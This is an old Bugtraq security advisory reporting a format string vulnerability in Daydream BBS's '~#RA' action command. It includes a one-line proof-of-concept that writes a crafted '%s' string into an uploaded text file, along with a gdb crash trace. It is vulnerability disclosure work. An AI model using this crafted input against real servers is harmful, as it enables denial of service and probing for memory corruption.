Daydream BBS Format strings issue.

From: KF (dotslash@snosoft.com)
Date: 12/31/01 

Date: Sun, 30 Dec 2001 19:14:31 -0500
From: KF <dotslash@snosoft.com>
To: bugtraq@security-focus.com

Daydream BBS recently underwent some security changes.Although the
buffer overflow
was fixed in the ~#RA command I am not sure if a format strings issue
was addressed Its my
understanding that the users of daydream have the option of adding
"Action commands"
("~#RA being one of them")into the text files that they post. If a user
forms a specialy crafted
text file uploads to daydream and then views the message using the menu
system the issue
could be exploited.

background info:

 ~#RA[FILE]|[max]|
        Show random textfile. Format for file is "/path/foobar%d.ext",
where %d is a random
        number (1-[max]).

example:

echo "~#RA%s%s%s%s%s%s" > filetoupload.gfx. Then place this file on the server and view it via the menu system.

Simple test to proove existance:
[root@linuxppc <mailto:root@linuxppc> bbs]# echo "~#RA%s%s%s%s%s%s" > display/iso/welcome.gfx

                   ·| All accounts deleted - login |·

                   :| as NEW! |:

                  .:| |:.

           . ....:::| NEW / CHAT / LOGOFF |:::.... .

                    `------------------------------'

Username: test

Password: ****

Program received signal SIGSEGV, Segmentation fault.

formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",

  flags=268615586) at typetext.c:594

594 *cm++ = *sr++;

(gdb) bt

#0 formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",

  flags=268615586) at typetext.c:594

(gdb) x/10s $r1

0x7fffd440: "\177ÿÚ\220\020\001Öì%s%s%s%s%s%s\n"

-KF